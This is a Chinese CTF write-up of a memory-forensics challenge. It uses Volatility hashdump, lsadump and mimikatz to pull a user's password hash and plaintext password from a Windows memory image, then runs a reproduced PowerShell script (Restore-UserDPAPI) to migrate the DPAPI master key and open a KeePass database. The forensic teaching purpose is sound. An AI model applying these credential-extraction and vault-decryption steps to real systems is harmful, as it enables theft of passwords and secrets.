karspersky-helpme

karspersky Helpme

常规分析

查看内存快照的属性

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
volatility -f ./memory.vmem imageinfo
Volatility Foundation Volatility Framework 2.6
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86
AS Layer1 : IA32PagedMemoryPae (Kernel AS)
AS Layer2 : FileAddressSpace (/home/flier/Desktop/karspersky/helpme/memory.vmem)
PAE type : PAE
DTB : 0x185000L
KDBG : 0x82961be8L
Number of Processors : 1
Image Type (Service Pack) : 0
KPCR for CPU 0 : 0x82962c00L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2017-09-25 12:18:53 UTC+0000
Image local date and time : 2017-09-25 15:18:53 +0300

查看内存快照的进程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
volatility -f ./memory.vmem --profile=Win7SP0x86 pstree
Volatility Foundation Volatility Framework 2.6
Name Pid PPid Thds Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
0x86aa8328:wininit.exe 400 336 3 74 2017-09-25 12:08:15 UTC+0000
. 0x86d28558:lsm.exe 516 400 9 141 2017-09-25 12:08:15 UTC+0000
. 0x8cbc0030:services.exe 500 400 7 191 2017-09-25 12:08:15 UTC+0000
.. 0x86f094f8:svchost.exe 768 500 20 452 2017-09-25 12:08:16 UTC+0000
.. 0x870aa3b8:vmtoolsd.exe 1684 500 9 288 2017-09-25 12:08:18 UTC+0000
... 0x85730030:cmd.exe 1956 1684 0 ------ 2017-09-25 12:18:53 UTC+0000
.... 0x86185880:ipconfig.exe 3096 1956 0 ------ 2017-09-25 12:18:53 UTC+0000
.. 0x86fbd500:spoolsv.exe 1304 500 13 324 2017-09-25 12:08:17 UTC+0000
.. 0x86f42860:svchost.exe 924 500 35 910 2017-09-25 12:08:16 UTC+0000
.. 0x86ee49d0:vmacthlp.exe 680 500 3 53 2017-09-25 12:08:16 UTC+0000
.. 0x86da7a58:svchost.exe 884 500 19 430 2017-09-25 12:08:16 UTC+0000
... 0x87036030:dwm.exe 1492 884 5 113 2017-09-25 12:08:17 UTC+0000
.. 0x86fd9538:svchost.exe 1344 500 20 307 2017-09-25 12:08:17 UTC+0000
.. 0x870ded40:msdtc.exe 2252 500 14 154 2017-09-25 12:08:29 UTC+0000
.. 0x86c3a7b8:svchost.exe 716 500 8 251 2017-09-25 12:08:16 UTC+0000
.. 0x86f81030:svchost.exe 1144 500 15 369 2017-09-25 12:08:16 UTC+0000
.. 0x8722cd40:SearchIndexer. 2008 500 12 558 2017-09-25 12:08:26 UTC+0000
.. 0x8709c6a8:VGAuthService. 1636 500 3 87 2017-09-25 12:08:18 UTC+0000
.. 0x85085488:sppsvc.exe 3808 500 4 151 2017-09-25 12:10:21 UTC+0000
.. 0x86dcb030:svchost.exe 620 500 11 350 2017-09-25 12:08:15 UTC+0000
... 0x86313800:WmiPrvSE.exe 1732 620 10 199 2017-09-25 12:08:25 UTC+0000
... 0x872a8848:WmiPrvSE.exe 2552 620 9 219 2017-09-25 12:08:45 UTC+0000
.. 0x86f71b78:svchost.exe 1064 500 12 560 2017-09-25 12:08:16 UTC+0000
.. 0x856aea58:svchost.exe 3844 500 12 350 2017-09-25 12:10:21 UTC+0000
.. 0x870107a0:taskhost.exe 1400 500 7 150 2017-09-25 12:08:17 UTC+0000
.. 0x871f1480:dllhost.exe 852 500 15 199 2017-09-25 12:08:25 UTC+0000
. 0x86d2c188:lsass.exe 508 400 6 538 2017-09-25 12:08:15 UTC+0000
0x86b11d40:csrss.exe 348 336 8 415 2017-09-25 12:08:15 UTC+0000
. 0x8504a7d8:conhost.exe 476 348 0 ------ 2017-09-25 12:18:53 UTC+0000
0x8703cc48:explorer.exe 1508 1476 24 763 2017-09-25 12:08:17 UTC+0000
. 0x87100030:vmtoolsd.exe 1792 1508 7 198 2017-09-25 12:08:19 UTC+0000
. 0x872a9458:KeePass.exe 2464 1508 7 304 2017-09-25 12:08:33 UTC+0000
0x84f4a8e8:System 4 0 87 397 2017-09-25 12:08:14 UTC+0000
. 0x8c537930:smss.exe 264 4 2 29 2017-09-25 12:08:14 UTC+0000
0x86bb5d40:csrss.exe 408 392 10 192 2017-09-25 12:08:15 UTC+0000
0x86ca2920:winlogon.exe 456 392 3 117 2017-09-25 12:08:15 UTC+0000

dump 屏幕

1
2
3
4
5
6
7
8
9
10
11
12
volatility -f ./memory.vmem --profile=Win7SP0x86 screenshot -D ./dump_true
Volatility Foundation Volatility Framework 2.6
Wrote ./dump_true/session_0.msswindowstation.mssrestricteddesk.png
Wrote ./dump_true/session_0.Service-0x0-3e4$.Default.png
Wrote ./dump_true/session_0.Service-0x0-3e5$.Default.png
Wrote ./dump_true/session_1.WinSta0.Default.png
Wrote ./dump_true/session_1.WinSta0.Disconnect.png
Wrote ./dump_true/session_1.WinSta0.Winlogon.png
Wrote ./dump_true/session_0.Service-0x0-3e7$.Default.png
Wrote ./dump_true/session_0.WinSta0.Default.png
Wrote ./dump_true/session_0.WinSta0.Disconnect.png
Wrote ./dump_true/session_0.WinSta0.Winlogon.png

KeePass

  • 发现这个地方有问题,是用的KeePass秘钥管理软件开启了一个叫FlagDatabase.kdbx的数据库
  • 于是,扫描文件
1
2
3
volatility -f ./memory.vmem --profile=Win7SP0x86 filescan | grep FlagDatabase.kdbx
Volatility Foundation Volatility Framework 2.6
0x000000003daeb2c0 8 0 R--r-- \Device\HarddiskVolume1\Users\user\FlagDatabase.kdbx
  • Dump 下来再说
1
2
3
volatility -f ./memory.vmem --profile=Win7SP0x86 dumpfiles -Q 0x000000003daeb2c0 -D ./dump_true
Volatility Foundation Volatility Framework 2.6
DataSectionObject 0x3daeb2c0 None \Device\HarddiskVolume1\Users\user\FlagDatabase.kdbx
volatility dump文件都是按照page的大小dump,要记得去除结尾的无用部分,这里就不一一赘述了

进一步分析

查找KeePass配置文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
volatility -f ./memory.vmem --profile=Win7SP0x86 filescan | grep KeePass
Volatility Foundation Volatility Framework 2.6
0x000000003da006c0 8 0 R--r-- \Device\HarddiskVolume1\Users\user\AppData\Roaming\KeePass\KeePass.config.xml
0x000000003da0e170 6 0 R--r-d \Device\HarddiskVolume1\Program Files\KeePass Password Safe 2\KeePassLibC32.dll
0x000000003da27ae0 8 0 R--r-- \Device\HarddiskVolume1\Program Files\KeePass Password Safe 2\KeePass.config.xml
0x000000003daa8e10 2 0 R--r-- \Device\HarddiskVolume1\Users\user\AppData\Roaming\KeePass\ProtectedUserKey.bin
0x000000003dce1850 6 0 R--r-d \Device\HarddiskVolume1\Program Files\KeePass Password Safe 2\unins000.exe
0x000000003dd01568 8 0 R--r-d \Device\HarddiskVolume1\Program Files\KeePass Password Safe 2\KeePass.exe.config
0x000000003dd01b78 8 0 R--r-d \Device\HarddiskVolume1\Program Files\KeePass Password Safe 2\KeePass.exe
0x000000003dd14a00 7 0 R--r-d \Device\HarddiskVolume1\Program Files\KeePass Password Safe 2\KeePass.exe
0x000000003ddb55f8 1 1 R--rw- \Device\HarddiskVolume1\Program Files\KeePass Password Safe 2
0x000000003ddb8bc8 5 0 R--r-d \Device\HarddiskVolume1\Windows\assembly\NativeImages_v2.0.50727_32\KeePass\61401321a8fb44541efab9aa5fb7fb69\KeePass.ni.exe
0x000000003e9f8468 8 0 R--r-d \Device\HarddiskVolume1\Program Files\KeePass Password Safe 2\KeePass.XmlSerializers.dll
0x000000003e9f8678 4 1 R--r-d \Device\HarddiskVolume1\Program Files\KeePass Password Safe 2\KeePass.XmlSerializers.dll
0x000000003ef96eb8 8 0 R--rw- \Device\HarddiskVolume1\Users\user\Desktop\KeePass 2.lnk
0x000000003ff6deb8 8 0 R--rw- \Device\HarddiskVolume1\Users\user\Desktop\KeePass 2.lnk

Dump \Device\HarddiskVolume1\Users\user\AppData\Roaming\KeePass\KeePass.config.xml

1
2
3
volatility -f ./memory.vmem --profile=Win7SP0x86 dumpfiles -Q 0x000000003da006c0 -D ./dump_true
Volatility Foundation Volatility Framework 2.6
DataSectionObject 0x3da006c0 None \Device\HarddiskVolume1\Users\user\AppData\Roaming\KeePass\KeePass.config.xml

分析配置文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
131 </PasswordGenerator>
132 <Defaults>
133 <OptionsTabIndex>0</OptionsTabIndex>
134 <SearchParameters>
135 <ComparisonMode>InvariantCultureIgnoreCase</ComparisonMode>
136 </SearchParameters>
137 <KeySources>
138 <Association>
139 <DatabasePath>..\..\Users\user\FlagDatabase.kdbx</DatabasePath>
140 <UserAccount>true</UserAccount>
141 </Association>
142 </KeySources>
143 </Defaults>
144 <Integration>
145 <HotKeyGlobalAutoType>393281</HotKeyGlobalAutoType>
146 <HotKeySelectedAutoType>0</HotKeySelectedAutoType>
147 <HotKeyShowWindow>393291</HotKeyShowWindow>
  • 这里的UserAccount置位true,表明使用了windows 用户的 master key 进行加密
  • 由于没有其他的加密选项,所以就是只用了windows的账户验证这一种加密

奔向答案

参考 http://www.harmj0y.net/blog/redteaming/a-case-study-in-attacking-keepass/

要恢复一个操作系统上用KeePass的windows账户验证加密的数据库,我们需要以下条件:

  • %APPDATA%\Microsoft\Protect\目录下的所有文件
    • Preferred
    • master key file with a GUID naming (Windows账户主密钥文件)
  • KeePass加密使用的软件主密钥
    • ProtectedUserKey.bin
  • Windows账户的信息
    • UserDomain
    • 密码
    • SID
    • UserName
  • xxxx.kdbx 加密后的秘钥数据库

目前,我们缺少的就是:

  • %APPDATA%\Microsoft\Protect\目录下的所有文件
  • KeePass加密使用的软件主密钥
  • Windows账户的信息

搞SID目录下的文件

1
0x000000003daa8d58 2 0 R--r-- \Device\HarddiskVolume1\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-196189514-4237867838-3788442389-1000\Preferred
1
2
3
volatility -f ./memory.vmem --profile=Win7SP0x86 dumpfiles -Q 0x000000003daa8d58 -D ./dump_true
Volatility Foundation Volatility Framework 2.6
DataSectionObject 0x3daa8d58 None \Device\HarddiskVolume1\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-196189514-4237867838-3788442389-1000\Preferred
这里有个坑点,就是 \Device\HarddiskVolume1\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-196189514-4237867838-3788442389-1000\7315eeac-ce04-46ff-87ac-4fc9cf1d41d3 windows主密钥文件搞不下来

无奈之下,只好通过主密钥文件的特征进行搜索

master key

ProtectedUserKey.bin

1
2
3
volatility -f ./memory.vmem --profile=Win7SP0x86 dumpfiles -Q 0x000000003daa8e10 -D ./dump_true
Volatility Foundation Volatility Framework 2.6
DataSectionObject 0x3daa8e10 None \Device\HarddiskVolume1\Users\user\AppData\Roaming\KeePass\ProtectedUserKey.bin

搞用户信息

尝试hashdump,发现密码太长,搞不定

1
2
3
4
5
volatility -f ./memory.vmem --profile=Win7SP0x86 hashdump
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
user:1000:aad3b435b51404eeaad3b435b51404ee:8943ccc24f82983c8b791b7f648679c0:::

尝试rekall mimikatz,搞定

1
rekall -f memory.vmem mimikatz

lsadump 也可以

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
volatility -f ./memory.vmem --profile=Win7SP0x86 lsadump
Volatility Foundation Volatility Framework 2.6
DefaultPassword
0x00000000 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 N...............
0x00000010 79 00 6f 00 75 00 5f 00 6e 00 65 00 65 00 64 00 y.o.u._.n.e.e.d.
0x00000020 5f 00 61 00 6e 00 6f 00 74 00 68 00 65 00 72 00 _.a.n.o.t.h.e.r.
0x00000030 5f 00 6b 00 65 00 79 00 5f 00 74 00 6f 00 5f 00 _.k.e.y._.t.o._.
0x00000040 70 00 61 00 73 00 73 00 5f 00 74 00 68 00 69 00 p.a.s.s._.t.h.i.
0x00000050 73 00 5f 00 6c 00 65 00 76 00 65 00 6c 00 00 00 s._.l.e.v.e.l...
DPAPI_SYSTEM
0x00000000 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ,...............
0x00000010 01 00 00 00 b8 5c 72 98 16 2b f1 72 c9 84 2c 68 .....\r..+.r..,h
0x00000020 f3 07 bb 2b e6 ce 6a 4b 73 f1 ec fa a6 51 61 7d ...+..jKs....Qa}
0x00000030 4a 82 97 61 db 55 d2 34 e8 df 7f b8 00 00 00 00 J..a.U.4........

密码是 yo_need_another_key_to_pass_this_level,真tmd长

搞账户信息

1
2
3
4
5
6
7
8
9
10
11
12
1508 explorer.exe 0x002ebf88 PUBLIC C:\Users\Public
1508 explorer.exe 0x002ebf88 SESSIONNAME Console
1508 explorer.exe 0x002ebf88 SystemDrive C:
1508 explorer.exe 0x002ebf88 SystemRoot C:\Windows
1508 explorer.exe 0x002ebf88 TEMP C:\Users\user\AppData\Local\Temp
1508 explorer.exe 0x002ebf88 TMP C:\Users\user\AppData\Local\Temp
1508 explorer.exe 0x002ebf88 USERDOMAIN WIN-GFCKT3R8MQ2
1508 explorer.exe 0x002ebf88 USERNAME user
1508 explorer.exe 0x002ebf88 USERPROFILE C:\Users\user
1508 explorer.exe 0x002ebf88 windir C:\Windows
1636 VGAuthService. 0x003207f0 ALLUSERSPROFILE C:\ProgramData
1636 VGAuthService. 0x003207f0 APPDATA C:\Windows\system32\config\systemprofile\AppD

恢复KeePass加密数据

1
Restore-UserDPAPI -Path C:\Users\W\Desktop\S-1-5-21-196189514-4237867838-3788442389-1000 -UserName user -UserDomain WIN-GFCKT3R8MQ2 -ProtectedUserKey C:\Users\W\Desktop\ProtectedUserKey.bin

Restore-UserDPAPI脚本如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
function Restore-UserDPAPI {
<#
.SYNOPSIS
Restores a user account's DPAPI master key on a new system.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
This function will take a backup of a user's DPAPI master key folder (C:\Users\<username>\AppData\Roaming\Microsoft\Protect\<SID>\),
copies the folder to %APPDATA%\Microsoft\Protect\ for the current user on a new machine, sets several
DPAPI MigratedUsers registry keys necessary, and invokes dpapimig.exe to kick off "Protected Content Migration".
If the password for the user account associated with the master key differs from the current user's,
the "Protected Content Migration" GUI will prompt for the old user password.
There is more information on this process from KeePass at https://sourceforge.net/p/keepass/wiki/Recover%20Windows%20User%20Account%20Credentials/
.PARAMETER Path
The C:\Users\<username>\AppData\Roaming\Microsoft\Protect\<SID>\ folder to restore, must be in S-1-... SID format.
.PARAMETER UserName
The username linked to the folder to restore.
.PARAMETER UserDomain
The domain (or local machine) linked to the UserName/folder.
.PARAMETER ProtectedUserKey
The path to an optional ProtectedUserKey.bin KeePass DPAPI blob.
.EXAMPLE
PS C:\Temp> Restore-UserDPAPI -Path C:\Temp\S-1-5-21-456218688-4216621462-1491369290-1210\ -UserName testuser -UserDomain testlab.local
Restores the DPAPI master key for the testlab.local\testuser (SID=S-1-5-21-456218688-4216621462-1491369290-1210) from
the C:\Temp\S-1-5-21-456218688-4216621462-1491369290-1210\ backup folder.
.EXAMPLE
PS C:\Temp> Restore-UserDPAPI -Path C:\Temp\S-1-5-21-456218688-4216621462-1491369290-1210\ -UserName testuser -UserDomain testlab.local -ProtectedUserKey ProtectedUserKey.bin
Restores the DPAPI master key for the testlab.local\testuser (SID=S-1-5-21-456218688-4216621462-1491369290-1210) from
the C:\Temp\S-1-5-21-456218688-4216621462-1491369290-1210\ backup folder, and copies the KeePass-specific
ProtectedUserKey.bin DPAPI blob into the proper location.
.LINK
https://sourceforge.net/p/keepass/wiki/Recover%20Windows%20User%20Account%20Credentials/
#>
[CmdletBinding()]
Param(
[Parameter(Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
[ValidateScript({ Test-Path -Path $_ })]
[String]
$Path,
[Parameter(Mandatory=$True)]
[ValidateNotNullOrEmpty()]
[String]
$UserName,
[Parameter(Mandatory=$True)]
[ValidateNotNullOrEmpty()]
[String]
$UserDomain,
[ValidatePattern('.*ProtectedUserKey\.bin')]
[ValidateScript({ Test-Path -Path $_ })]
[Alias('KeePassBlob')]
[String]
$ProtectedUserKey
)
$UserFolder = Get-Item $Path
$SID = $UserFolder.Name
if($SID -notmatch '^S-1-.*') {
throw "User folder must be in 'S-1-...' SID format!"
}
Write-Host "`n[*] Copying $($UserFolder.FullName) DPAPI folder to $ENV:APPDATA\Microsoft\Protect\"
Copy-Item -Path $UserFolder -Destination $ENV:APPDATA\Microsoft\Protect\ -Recurse -Force
Write-Host "`n[*] Creating DPAPI MigratedUsers registry keys"
$Null = New-Item -Path "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DPAPI\MigratedUsers\$SID\UserDomain" -Force
$Null = New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DPAPI\MigratedUsers\$SID\UserDomain" -Name $UserDomain -Force
$Null = New-Item -Path "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DPAPI\MigratedUsers\$SID\UserName" -Force
$Null = New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DPAPI\MigratedUsers\$SID\UserName" -Name $UserName -Force
Write-Host "`n[*] Calling dpapimig.exe... (this may take just a bit)`n"
Start-Process $ENV:WINDIR\System32\dpapimig.exe -NoNewWindow -Wait
if($PSBoundParameters['ProtectedUserKey']) {
$ProtectedUserKeyFile = Get-Item $ProtectedUserKey
Write-Host "[*] Copying $($ProtectedUserKeyFile.FullName) to $ENV:APPDATA\KeePass\`n"
if (-not (Test-Path -Path $ENV:APPDATA\KeePass\)) { $Null = New-Item $ENV:APPDATA\KeePass\ -Type Directory }
Copy-Item -Path $ProtectedUserKeyFile -Destination $ENV:APPDATA\KeePass\ -Force
}
}

会要求输入需要恢复的用户的密码,输入即可you_need_another_key_to_pass_this_level

打开KeePass,选择使用windows账户进行验证